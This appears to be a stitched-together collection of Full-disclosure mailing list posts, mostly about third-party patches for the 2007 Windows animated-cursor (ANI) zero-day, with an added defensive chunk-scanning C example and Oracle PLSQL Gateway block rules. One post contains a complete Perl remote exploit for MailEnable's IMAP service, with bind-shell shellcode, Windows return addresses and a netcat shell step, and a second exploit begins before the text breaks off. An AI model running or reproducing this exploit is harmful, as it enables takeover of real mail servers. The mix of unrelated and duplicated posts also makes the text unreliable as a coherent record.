1. The patch ships the Microsoft Layer for Unicode (MSLU) in Unicows.dll which enables us to support platforms (Windows 95/98/Me) which are no longer officially supported by Microsoft. You can replace that DLL with your own copy of the MSLU library if you're concerned about its origins -- it hasn't been modified at all.

2. The patch sources static link to Gil Dabah's distorm disassembler library (distorm.lib) as well. That library is used to identify the vulnerable code within the affected DLL. You can build your own of that, from source, if you wish: http://www.ragestorm.net/distorm/

Don't worry... the patch doesn't bite. In either sense of the word.

Regards,
Matt Murphy
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
Hardly. Don't remember that last Zero day in 2006 do you? http://www.eweek.com/article2/0,1895,2019162,00.asp

The Zert folks have coded up zero day patches before (VML and WMF anyone?) and are folks actively out in the community. While I'm not ready yet to install third party patches on systems, I admire them for the community need that they are reacting to. Gadi and the crew work hard and have my respect for their efforts.

If you are willing to evaluate the eEye patch, Zert's should be higher on your list as well since reportedly it works better than eEye's.

Regardless it's a moot point. The real patch is out. Install that one. It's on Windows update now.

Stefan Kelm wrote:

Hi, more information about the patch released April 1st can be found here: http://zert.isotf.org/ Including: 1. Technical information. 2. Why this patch was released when eeye already released a third party patch.

Has anyone actually checked what this patch does? Who are ZERT and ISOTF respectively (About ISOTF at http://www.isotf.org/?page_value=0 says a lot...)? ...or is this an April Fool's joke?

Cheers, Stefan.
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
a/s/l? I currently reside in Fort Collins, Colorado and I obtained my PhD from Texas A&M.

- - neal

On Tue, 03 Apr 2007 13:52:42 -0500 Susan Bradley, CPA aka Ebitz - SBS Rocks [MVP] [EMAIL PROTECTED] wrote:

Hardly. Don't remember that last Zero day in 2006 do you? http://www.eweek.com/article2/0,1895,2019162,00.asp

The Zert folks have coded up zero day patches before (VML and WMF anyone?) and are folks actively out in the community. While I'm not ready yet to install third party patches on systems, I admire them for the community need that they are reacting to. Gadi and the crew work hard and have my respect for their efforts.

If you are willing to evaluate the eEye patch, Zert's should be higher on your list as well since reportedly it works better than eEye's.

Regardless it's a moot point. The real patch is out. Install that one. It's on Windows update now.

Stefan Kelm wrote:

Hi, more information about the patch released April 1st can be found here: http://zert.isotf.org/ Including: 1. Technical information. 2. Why this patch was released when eeye already released a third party patch.

Has anyone actually checked what this patch does? Who are ZERT and ISOTF respectively (About ISOTF at http://www.isotf.org/?page_value=0 says a lot...)? ...or is this an April Fool's joke?

Cheers, Stefan.
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
And there's a patch for that Realtek already to go on the download site. (read the caveat section). So far all I've seen/heard is that one.

This is patching 7 graphics items not just the one. ...that's 6 more things the folks that throw at me from those Metasploit modules ;-)

Jason Frisvold wrote:

On 4/3/07, Susan Bradley, CPA aka Ebitz - SBS Rocks [MVP] [EMAIL PROTECTED] wrote:

the community need that they are reacting to. Gadi and the crew work hard and have my respect for their efforts.

Agreed. Previous patches worked as advertised with no adverse side effects here.

If you are willing to evaluate the eEye patch, Zert's should be higher on your list as well since reportedly it works better than eEye's.

eEye's patch only protects from attacks outside of %systemroot%. If an attacker can place a vulnerable file within %systemroot%, all bets are off. ZERT's patch, on the other hand, protects regardless of where the file is located. It specifically prevents the stack overflow condition by blocking chunks larger than 36 bytes from being copied.

Regardless it's a moot point. The real patch is out. Install that one. It's on Windows update now.

ISC is reporting problems with the Microsoft patch. A problem with the Realtek HD Audio Control Panel has been confirmed and patched by Microsoft. Other problems have been reported but no additional information on them has been released at this point.
[Full-disclosure] More information on ZERT patch for ANI 0day
Hi, more information about the patch released April 1st can be found here: http://zert.isotf.org/

Including:
1. Technical information.
2. Why this patch was released when eeye already released a third party patch.

The newly discovered zero-day vulnerability in the parsing of animated cursors is very similar to the one previously discovered by eEye that was patched by Microsoft in MS05-002. Basically an anih chunk in an animated cursor RIFF file is read into a stack buffer of a fixed size (36 bytes) but the actual memory copy operation uses the length field provided inside the anih chunk, giving an attacker an easy route to overflow the stack and gain control of the execution of the process.

With the MS05-002 patch, Microsoft added a check for the length of the chunk before copying it to the buffer. However, they neglected to audit the rest of the code for any other instances of the vulnerable copy routine. As it turns out, if there are two anih chunks in the file, the second chunk will be handled by a separate piece of code which Microsoft did not fix. This is what the authors of the zero-day discovered.

Although eEye has released a third-party patch that will prevent the latest exploit from working, it doesn't fix the flawed copy routine. It simply requires that any cursors loaded must reside within the Windows directory (typically C:\WINDOWS\ or C:\WINNT\). This approach should successfully mitigate most drive-bys, but might be bypassed by an attacker with access to this directory.

For this reason, ZERT is releasing a patch which addresses the core of the vulnerability, by ensuring that no more than 36 bytes of an anih chunk will be copied to the stack buffer, thus eliminating all potential exploit paths while maintaining compatibility with well-formatted animated cursor files.

Gadi.
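The bound ZERT enforces and the second-chunk gap in MS05-002 that the post describes, as an added C example that is not ZERT's, eEye's or Microsoft's code: a file scanner that walks a RIFF ACON cursor and rejects any anih chunk whose declared size exceeds the 36-byte buffer, applying the check to every anih chunk (including ones nested inside LIST chunks) rather than only the first. The RIFF/ACON/LIST layout is the standard .ani container; the sample files are constructed in-block with zero filler and the verdict names are this example's own.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Size of the fixed stack buffer that receives an anih header (36 bytes, per the write-up). */
#define ANIH_MAX 36u

enum ani_verdict { ANI_OK = 0, ANI_NOT_RIFF, ANI_TRUNCATED, ANI_OVERSIZED_ANIH };

struct ani_report {
    int anih_count;     /* anih chunks seen, including those nested inside LIST chunks */
    uint32_t bad_size;  /* declared size of the first oversized anih chunk, if any */
};

static uint32_t rd32le(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void wr32le(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Walk the RIFF chunks in buf[0..len). Every anih chunk is bounds-checked, not just
 * the first one (the gap the write-up describes in MS05-002), and LIST chunks are
 * descended into so a second anih chunk cannot hide inside a list. */
static int walk_chunks(const uint8_t *buf, size_t len, struct ani_report *rep) {
    size_t off = 0;
    while (off < len) {
        if (len - off < 8) return ANI_TRUNCATED;        /* a chunk needs id + size */
        const uint8_t *id = buf + off;
        uint32_t size = rd32le(buf + off + 4);
        off += 8;
        if (size > len - off) return ANI_TRUNCATED;     /* declared size runs past the data */
        if (memcmp(id, "anih", 4) == 0) {
            rep->anih_count++;
            if (size > ANIH_MAX) { rep->bad_size = size; return ANI_OVERSIZED_ANIH; }
        } else if (memcmp(id, "LIST", 4) == 0 && size >= 4) {
            int v = walk_chunks(buf + off + 4, size - 4, rep);  /* skip the list type tag */
            if (v != ANI_OK) return v;
        }
        off += size + (size & 1);                       /* RIFF pads odd chunks to even */
    }
    return ANI_OK;
}

/* Scan a complete .ani file: "RIFF" size "ACON" header, then the chunk list. */
int ani_scan(const uint8_t *buf, size_t len, struct ani_report *rep) {
    memset(rep, 0, sizeof *rep);
    if (len < 12 || memcmp(buf, "RIFF", 4) != 0 || memcmp(buf + 8, "ACON", 4) != 0)
        return ANI_NOT_RIFF;
    uint32_t riff_size = rd32le(buf + 4);   /* covers "ACON" plus all chunks */
    if (riff_size < 4 || riff_size - 4 > len - 12) return ANI_TRUNCATED;
    return walk_chunks(buf + 12, riff_size - 4, rep);
}

/* Constructed sample builder (not a real cursor): an ACON file with n anih chunks of
 * the given declared sizes and zero-filled payloads. Returns the file length, 0 if
 * it does not fit in cap bytes. */
static size_t build_sample(uint8_t *out, size_t cap, const uint32_t *sizes, int n) {
    size_t off = 12;
    for (int i = 0; i < n; i++) {
        size_t need = 8 + sizes[i] + (sizes[i] & 1);
        if (off + need > cap) return 0;
        memcpy(out + off, "anih", 4);
        wr32le(out + off + 4, sizes[i]);
        memset(out + off + 8, 0, need - 8);
        off += need;
    }
    memcpy(out, "RIFF", 4);
    wr32le(out + 4, (uint32_t)(off - 8));
    memcpy(out + 8, "ACON", 4);
    return off;
}

/* Build a sample with the given anih sizes and scan it; returns the verdict. */
int scan_sizes(const uint32_t *sizes, int n, struct ani_report *rep) {
    uint8_t buf[512];
    size_t len = build_sample(buf, sizeof buf, sizes, n);
    if (len == 0) { memset(rep, 0, sizeof *rep); return ANI_TRUNCATED; }
    return ani_scan(buf, len, rep);
}

int main(void) {
    static const char *names[] = { "ok", "not-riff", "truncated", "oversized-anih" };
    const uint32_t well_formed[] = { 36 };        /* one proper 36-byte header */
    const uint32_t two_chunks[]  = { 36, 128 };   /* valid first chunk, oversized second */
    struct ani_report rep;
    int v = scan_sizes(well_formed, 1, &rep);
    printf("well-formed: %s (anih chunks seen: %d)\n", names[v], rep.anih_count);
    v = scan_sizes(two_chunks, 2, &rep);
    printf("two anih:    %s (anih chunks seen: %d, declared size %u)\n",
           names[v], rep.anih_count, rep.bad_size);
    return 0;
}
```

A checker that stopped after the first anih chunk would pass the second sample, which is exactly the case the post says MS05-002 left open.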
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
Gadi Evron wrote:

Although eEye has released a third-party patch that will prevent the latest exploit from working, it doesn't fix the flawed copy routine. It simply requires that any cursors loaded must reside within the Windows directory (typically C:\WINDOWS\ or C:\WINNT\). This approach should successfully mitigate most drive-bys, but might be bypassed by an attacker with access to this directory.

I'm thinking that an attacker with write access to %systemroot% probably has juicier, simpler targets to attack (which potentially let them run code in a higher security context) than animated cursors.

- James.

-- 
James (njan) Eaton-Lee | UIN: 10807960 | http://www.jeremiad.org
All at sea again / And now my hurricanes
Have brought down this ocean rain / To bathe me again
https://www.bsrf.org.uk | ca: https://www.cacert.org/index.php?id=3
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
Gadi,

Gadi Evron wrote:

I'm thinking that an attacker with write access to %systemroot% probably has juicier, simpler targets to attack (which potentially let them run code in a higher security context) than animated cursors.

http://www.milw0rm.com/exploits/3636

I'm struggling to see what direct relevance this has to what I just said...

- James.

-- 
James (njan) Eaton-Lee | UIN: 10807960 | http://www.jeremiad.org
All at sea again / And now my hurricanes
Have brought down this ocean rain / To bathe me again
https://www.bsrf.org.uk | ca: https://www.cacert.org/index.php?id=3
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
Gadi,

Gadi Evron wrote:

It has relevance to what you replied to.

No doubt - but unfortunately not the part of it that I was actually responding to; this isn't actually a reply to what I said, just a random vaguely topical link.

- James.

-- 
James (njan) Eaton-Lee | UIN: 10807960 | http://www.jeremiad.org
All at sea again / And now my hurricanes
Have brought down this ocean rain / To bathe me again
https://www.bsrf.org.uk | ca: https://www.cacert.org/index.php?id=3
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
Gadi,

Gadi Evron wrote:

For a real current attack.

Understandably. This is the attack which this thread is about, as indicated in the subject line of the e-mail.

To recap, you used the phrase "flawed copy routine" to refer to the fact that you could carry out an attack using this particular attack method by writing to "typically C:\WINDOWS\ or C:\WINNT\".

Again, to recap, my point was: an attacker with write access to %systemroot% probably has juicier, simpler targets to attack (which potentially let them run code in a higher security context) than animated cursors.

Do you have any reply to make to what I actually *said*?

- James.

-- 
James (njan) Eaton-Lee | UIN: 10807960 | http://www.jeremiad.org
All at sea again / And now my hurricanes
Have brought down this ocean rain / To bathe me again
https://www.bsrf.org.uk | ca: https://www.cacert.org/index.php?id=3
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
Well I did my patch and I'm giving it away to be modifiable by everyone out there. I did it for version 5.1.2600.2622 of user32.dll, English version, not sure if that is the last version from M$ (with the way they handle patches you know you could miss one); anyway in any case I believe there is enough information in the sources if it needs a fix or... not, if Microsoft really comes with a patch tomorrow. So far you don't have to be at the mercy of the chinese worm or evil random cracker. Let me know if it's a POS, if it has bugs etc... Maybe it's not needed by tomorrow but I was already doing it. So if it helps.. Then great!!

download binaries here http://aircash.sourceforge.net/micro-distro-src.zip and sources here http://aircash.sourceforge.net/micro-distro-bin.zip

just my 2 cents

Regards
Waldo

On 4/1/07, Gadi Evron [EMAIL PROTECTED] wrote:

Hi, more information about the patch released April 1st can be found here: http://zert.isotf.org/

Including:
1. Technical information.
2. Why this patch was released when eeye already released a third party patch.

The newly discovered zero-day vulnerability in the parsing of animated cursors is very similar to the one previously discovered by eEye that was patched by Microsoft in MS05-002. Basically an anih chunk in an animated cursor RIFF file is read into a stack buffer of a fixed size (36 bytes) but the actual memory copy operation uses the length field provided inside the anih chunk, giving an attacker an easy route to overflow the stack and gain control of the execution of the process.

With the MS05-002 patch, Microsoft added a check for the length of the chunk before copying it to the buffer. However, they neglected to audit the rest of the code for any other instances of the vulnerable copy routine. As it turns out, if there are two anih chunks in the file, the second chunk will be handled by a separate piece of code which Microsoft did not fix. This is what the authors of the zero-day discovered.

Although eEye has released a third-party patch that will prevent the latest exploit from working, it doesn't fix the flawed copy routine. It simply requires that any cursors loaded must reside within the Windows directory (typically C:\WINDOWS\ or C:\WINNT\). This approach should successfully mitigate most drive-bys, but might be bypassed by an attacker with access to this directory.

For this reason, ZERT is releasing a patch which addresses the core of the vulnerability, by ensuring that no more than 36 bytes of an anih chunk will be copied to the stack buffer, thus eliminating all potential exploit paths while maintaining compatibility with well-formatted animated cursor files.

Gadi.
[Full-disclosure] More information on ZERT patch for ANI 0day
Can someone point out what one might see or expect if exploited by this?

Message: 14
Date: Sun, 1 Apr 2007 21:19:39 -0500 (CDT)
From: Gadi Evron [EMAIL PROTECTED]
Subject: [Full-disclosure] More information on ZERT patch for ANI 0day
To: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Message-ID: [EMAIL PROTECTED]
Content-Type: TEXT/PLAIN; charset=US-ASCII

Hi, more information about the patch released April 1st can be found here: http://zert.isotf.org/

Including:
1. Technical information.
2. Why this patch was released when eeye already released a third party patch.

The newly discovered zero-day vulnerability in the parsing of animated cursors is very similar to the one previously discovered by eEye that was patched by Microsoft in MS05-002. Basically an anih chunk in an animated cursor RIFF file is read into a stack buffer of a fixed size (36 bytes) but the actual memory copy operation uses the length field provided inside the anih chunk, giving an attacker an easy route to overflow the stack and gain control of the execution of the process.

With the MS05-002 patch, Microsoft added a check for the length of the chunk before copying it to the buffer. However, they neglected to audit the rest of the code for any other instances of the vulnerable copy routine. As it turns out, if there are two anih chunks in the file, the second chunk will be handled by a separate piece of code which Microsoft did not fix. This is what the authors of the zero-day discovered.

Although eEye has released a third-party patch that will prevent the latest exploit from working, it doesn't fix the flawed copy routine. It simply requires that any cursors loaded must reside within the Windows directory (typically C:\WINDOWS\ or C:\WINNT\). This approach should successfully mitigate most drive-bys, but might be bypassed by an attacker with access to this directory.

For this reason, ZERT is releasing a patch which addresses the core of the vulnerability, by ensuring that no more than 36 bytes of an anih chunk will be copied to the stack buffer, thus eliminating all potential exploit paths while maintaining compatibility with well-formatted animated cursor files.

Gadi.

-- 
Thank You
Randall M
=
You too can have your very own Computer! Note: Side effects include: Blue screens; interrupt violation; illegal operations; remote code exploitations; virus and malware infestations; and other unknown vulnerabilities.
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
On Mon, 2 Apr 2007, James (njan) Eaton-Lee wrote:
> Gadi Evron wrote:
>> Although eEye has released a third-party patch that will prevent the latest exploit from working, it doesn't fix the flawed copy routine. It simply requires that any cursors loaded must reside within the Windows directory (typically C:\WINDOWS\ or C:\WINNT\). This approach should successfully mitigate most drive-bys, but might be bypassed by an attacker with access to this directory.
>
> I'm thinking that an attacker with write access to %systemroot% probably has juicier, simpler targets to attack (which potentially let them run code in a higher security context) than animated cursors.

http://www.milw0rm.com/exploits/3636

> - James.
>
> --
> James (njan) Eaton-Lee | UIN: 10807960 | http://www.jeremiad.org
> All at sea again / And now my hurricanes
> Have brought down this ocean rain / To bathe me again
> https://www.bsrf.org.uk | ca: https://www.cacert.org/index.php?id=3
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
On Mon, 2 Apr 2007, James (njan) Eaton-Lee wrote:
> Gadi,
>
> Gadi Evron wrote:
>>> I'm thinking that an attacker with write access to %systemroot% probably has juicier, simpler targets to attack (which potentially let them run code in a higher security context) than animated cursors.
>>
>> http://www.milw0rm.com/exploits/3636
>
> I'm struggling to see what direct relevance this has to what I just said...

It has relevance to what you replied to.

> - James.
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
On Mon, 2 Apr 2007, James (njan) Eaton-Lee wrote:
> Gadi,
>
> Gadi Evron wrote:
>> It has relevance to what you replied to.
>
> No doubt - but unfortunately not the part of it that I was actually responding to; this isn't actually a reply to what I said, just a random vaguely topical link.

For a real current attack.

> - James.
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
On Mon, 2 Apr 2007, James (njan) Eaton-Lee wrote:
> Gadi,
>
> Gadi Evron wrote:
>> For a real current attack.
>
> Understandably. This is the attack which this thread is about, as indicated in the subject line of the e-mail. To recap, you used the phrase "flawed copy routine" to refer to the fact that you could carry out an attack using this particular attack method by writing to "typically C:\WINDOWS\ or C:\WINNT\". Again, to recap, my point was: an attacker with write access to %systemroot% probably has juicier, simpler targets to attack (which potentially let them run code in a higher security context) than animated cursors.
>
> Do you have any reply to make to what I actually *said*?

Not really, maybe others do.

> - James.
[Full-disclosure] More MailEnable exploits..
The following should somewhat specify any mention of "unspecified" in the following BIDs, patched as some idiots cannot resist trying to own mailenable.com...

BID: 21252 (maildisable-v3.pl)
BID: 21492 (maildisable-v6.pl)

--- ([EMAIL PROTECTED])

#!/usr/bin/perl
#
# maildisable-v3.pl
#
# Mail Enable Professional/Enterprise v2.32-4 (win32) remote exploit
# by mu-b - Thu Nov 23 2006
#
# - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX
#              Mail Enable Professional v2.33 (win32)
#              Mail Enable Professional v2.34 (win32)
#
# what does this remind you off?
# Note: timing is quite critical with this!!, so change $send_delay
#       if it doesn't work
#

use Getopt::Std; getopts('t:n:', \%arg);
use Socket;

# metasploit win32 bindshell port 1337
my $zshell_win32_bind =
    "\x33\xc9\x83\xe9\xb0".
    "\x81\xc4\xd0\xfd\xff\xff".
    "\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d".
    "\xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96".
    "\xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2".
    "\x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0".
    "\xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41".
    "\x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82".
    "\x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2".
    "\x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39".
    "\xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9".
    "\x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b".
    "\x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a".
    "\x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88".
    "\x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01".
    "\xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20".
    "\x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e".
    "\xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39".
    "\x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44".
    "\xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96".
    "\x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38".
    "\xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9".
    "\x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09".
    "\x4e\x33\xe4\x96\xcd\xcc\x32\x69";

# ff e4 - jmp %esp
my @offsets = (
    "\xf8\xfe\x5a\x7c",   # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099
    "\xe2\x48\xe6\x77",   # WinXP SP0 KERNEL32.dll 5.1.2600.0
    "\x06\x38\xe6\x77",   # WinXP SP1 KERNEL32.dll 5.1.2600.11061
    "\xd9\xae\x80\x7c",   # WinXP SP2 KERNEL32.dll 5.1.2600.21802
    "\x62\x51\xeb\x77",   # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300
    "\xef\xbe\xad\xde"    # DoS
);

print_header;

my $target;
my $offset;

if (defined($arg{'t'})) { $target = $arg{'t'} }
if (defined($arg{'n'})) { $offset = $arg{'n'} }

if (!(defined($target))) {
    usage;
}

if (!(defined($offset))) {
    $offset = 0;
}

if ($offset > $#offsets) {
    print("only ".($#offsets+1)." targets known!!\n");
    exit(1);
} else {
    $offset = $offsets[$offset];
}

my $imapd_port = 143;
my $send_delay = 2;

my $NOP = 'A';
my $START_PAD = 3;

if (connect_host($target, $imapd_port)) {
    print("- * Connected\n");

    send(SOCKET, "1 LOGIN {1022}\r\n", 0);
    sleep(2);

    print("- * Sending padding payload\n");
    # first recv 0x3fe, NULL tricks strncpy...
    send(SOCKET, "\x00".($NOP x 1020), 0);
    sleep($send_delay);

    print("- * Sending payload\n");
    $buf = ($NOP x $START_PAD).          # padding
           "\xee\xaf\xdc\xba".           # dummy var_0
           "\xef\xbe\xad\xde".           # EBP
           $offset.                      # EIP
           "\xdc\xa3\x19\x03".           # dummy arg_0
           # "\xdc\xa3\x19\x03"          # v2.33
           ($NOP x 4).                   # NOPS
           $zshell_win32_bind.           # hellcode
           $NOP x (0x3fd-$START_PAD-16-length($zshell_win32_bind)-5);
    send(SOCKET, $buf, 0);
    sleep($send_delay);

    print("- * Successfully sent payload!\n");
    print("- * nc ".$target." 1337 for shell...\n");
}

sub print_header {
    print("MailEnable Pro v2.32-4 (HOTFIX) remote exploit\n");
    print("by: [EMAIL PROTECTED]\n\n");
}

sub usage {
    print(qq(Usage: $0 -t <hostname>
    -t <hostname>: hostname to test
    -n <num>     : return addy offset number
));
    exit(1);
}

sub connect_host {
    ($target, $port) = @_;

    $iaddr = inet_aton($target) || die("Error: $!\n");
    $paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n");
    $proto = getprotobyname('tcp') || die("Error: $!\n");

    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
    connect(SOCKET, $paddr) || die("Error: $!\n");

    return(1338);
}

#!/usr/bin/perl
#
# maildisable-v6.pl
#
# Mail Enable Professional <=v2.35 (win32) remote exploit
# by mu-b - Tue Dec 5 2006
#
# - Tested on: Mail Enable Professional v2.35 (win32)
#
# Note: timing
[Full-disclosure] more on browser trust
http://www.gnucitizen.org/blog/xssing-the-lan-4

--
pdp (architect)
http://www.gnucitizen.org
[Full-disclosure] more than just malware.. [was: Google Malware Search]
Guys,

HD and the guys at Websense are obviously very cool for noting this Google hacking technique and exploiting it (HD publicly). Still, this thing can be used far and wide.. a lot more than just for known signatures of malware, etc.

I was lucky enough to be playing with this for a bit before Websense went completely public and HD made it public, so I came up with a few more possibilities... Also, I have cool friends who played with this and gave me some ideas too! :)

A few examples I gave in my blog on this, inspired by Websense and then HD's new tool, are to look for other signatures rather than just known stuff. For example, looking for UPX packers results in almost 10K suspect samples:

signature: 4550 UPX1

The PE binary part, and then the UPX section named UPX1.

Trying other combinations, possibly along with the filetype: feature, can result in many interesting findings other than known malware. How many packers and protection systems are out there for starters? Also, tried any checks for open directory indexes? :)

I wrote more about this on my blog at securiteam:
http://blogs.securiteam.com/index.php/archives/513

Gadi.
[Full-disclosure] More on the workaround for the unpatched Oracle PLSQL Gateway flaw
According to Oracle, the workaround I posted, that prevents exploitation of a critical vulnerability that Oracle has so far failed to fix, breaks certain applications that sit atop their PLSQL Gateway. Though my workaround prevents exploitation of the critical flaw and thus protects vulnerable systems against attack, Oracle has made no effort to furnish me, or anyone else for that matter, with more information on how the workaround breaks some of their applications. As such, improving the workaround so it doesn't break these few applications has been mildly annoying. But I think I've tracked it down. The workaround as is

RewriteEngine on
RewriteCond %{QUERY_STRING} ^.*\).*|.*%29.*$
RewriteRule ^.*$ http://127.0.0.1/denied.htm?attempted-attack
RewriteRule ^.*\).*|.*%29.*$ http://127.0.0.1/denied.htm?attempted-attack

will trigger if a right facing bracket ')' appears in the PATH_INFO or _anywhere_ in the query string. Thus, if the value of a query string parameter contains a bracket the workaround will trigger. As far as the flaw is concerned, we need only concern ourselves with brackets that appear in the query string parameter name - not in the value for the parameter name. As such, if we modify the workaround to

RewriteEngine on
RewriteCond %{QUERY_STRING} ^.*\).*=|.*%29.*=$
RewriteRule ^.*$ http://127.0.0.1/denied.htm?attempted-attack
RewriteRule ^.*\).*|.*%29.*$ http://127.0.0.1/denied.htm?attempted-attack

we can prevent exploitation if the query string parameter name has a bracket whilst still allowing brackets in the parameter value. This can be tidied up to read

RewriteEngine on
RewriteCond %{QUERY_STRING} \).*=|%29.*=
RewriteRule .? http://127.0.0.1/denied.htm?attempted-attack
RewriteRule \)|%29 http://127.0.0.1/denied.htm?attempted-attack
# Thanks, Mike Pomraning!

For those that haven't been able to adopt the workaround because it would break their specific application, then the modified workaround should work in your situation.

Cheers,
David Litchfield
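The original and the modified rules can be compared offline by running their regular expressions against request paths and query strings; this is an added C example, not David's configuration or any Oracle code, and the constructed sample URLs and the use of POSIX regex.h (standing in for Apache's regex engine) are the example's own assumptions.

```c
#include <regex.h>
#include <string.h>

/* Patterns copied from the rules above.  The RewriteCond is tested against the
 * query string; the second RewriteRule is tested against the URL path. */
#define ORIG_QUERY_PATTERN "^.*\\).*|.*%29.*$"   /* original workaround */
#define NEW_QUERY_PATTERN  "\\).*=|%29.*="       /* tidied-up modified workaround */
#define PATH_PATTERN       "\\)|%29"

/* 1 if pattern matches s, 0 if not, -1 if the pattern fails to compile. */
static int matches(const char *pattern, const char *s) {
    regex_t re;
    if (regcomp(&re, pattern, REG_EXTENDED | REG_NOSUB) != 0)
        return -1;
    int hit = regexec(&re, s, 0, NULL, 0) == 0;
    regfree(&re);
    return hit;
}

/* Split "path?query" into the two halves mod_rewrite matches separately. */
static void split_url(const char *url, char *path, size_t cap, const char **query) {
    const char *q = strchr(url, '?');
    size_t plen = q ? (size_t)(q - url) : strlen(url);
    if (plen >= cap)
        plen = cap - 1;
    memcpy(path, url, plen);
    path[plen] = '\0';
    *query = q ? q + 1 : "";
}

/* Would the original workaround redirect this request to denied.htm? */
int original_blocks(const char *url) {
    char path[512]; const char *query;
    split_url(url, path, sizeof path, &query);
    return matches(PATH_PATTERN, path) || matches(ORIG_QUERY_PATTERN, query);
}

/* Would the modified workaround redirect it?  A ')' in a parameter name is always
 * followed by '=', so it matches; a ')' in the last parameter's value has no '='
 * after it and passes.  A ')' in a value that is followed by a further "name="
 * pair still matches, so the refinement is a heuristic, not a query-string parse. */
int modified_blocks(const char *url) {
    char path[512]; const char *query;
    split_url(url, path, sizeof path, &query);
    return matches(PATH_PATTERN, path) || matches(NEW_QUERY_PATTERN, query);
}
```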
[Full-disclosure] More about the impact of the Trend sigs
http://www.asahi.com/english/Herald-asahi/TKY200504260127.html

From the Asahi Shimbun:

Trend Micro antivirus fix wasn't tested before release
04/26/2005
The Asahi Shimbun

An antivirus software program update that caused widespread computer problems over the weekend was not thoroughly tested prior to its release, maker Trend Micro Inc. admitted Sunday.

A bug in the Virus Buster software caused computer operations to loop, causing affected machines to slow down or crash. The glitch paralyzed rail, media and other online networks for hours in Japan on Saturday.

After tens of thousands of computers downloaded and installed the upgrade, their operating systems began experiencing the problems.

[...]

TS